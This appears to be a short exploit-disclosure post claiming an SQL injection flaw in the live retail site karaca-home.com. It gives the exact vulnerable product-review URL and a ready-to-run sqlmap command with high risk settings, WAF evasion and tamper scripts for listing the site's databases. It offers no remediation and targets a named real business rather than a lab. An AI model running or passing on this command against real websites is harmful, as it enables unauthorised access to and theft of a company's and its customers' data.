Karaca Home SQL Injection Vulnerable

# Exploit Title: Karaca Home SQL Injection Vulnerable
# Date: 2021-04-09
# Exploit Author: Xale & BetLex "Turkish Hackers"
# Tested on: Windows 10 - Kali Linux

----------------------------------------

"""
Site : karaca-home.com 
Vulnerable URL : https://www.karaca-home.com/index.php?route=product/product/review&product_id=3942974
sqlmap Payload : sqlmap -u "https://www.karaca-home.com/index.php?route=product/product/review&product_id=3942974" --risk=3 --random-agent -v 3 --skip-waf --tamper=space2comment,between --batch --dbs
Video : https://disk.yandex.com.tr/i/CYIBBq-u0iFT5g

"""

---------------------------------------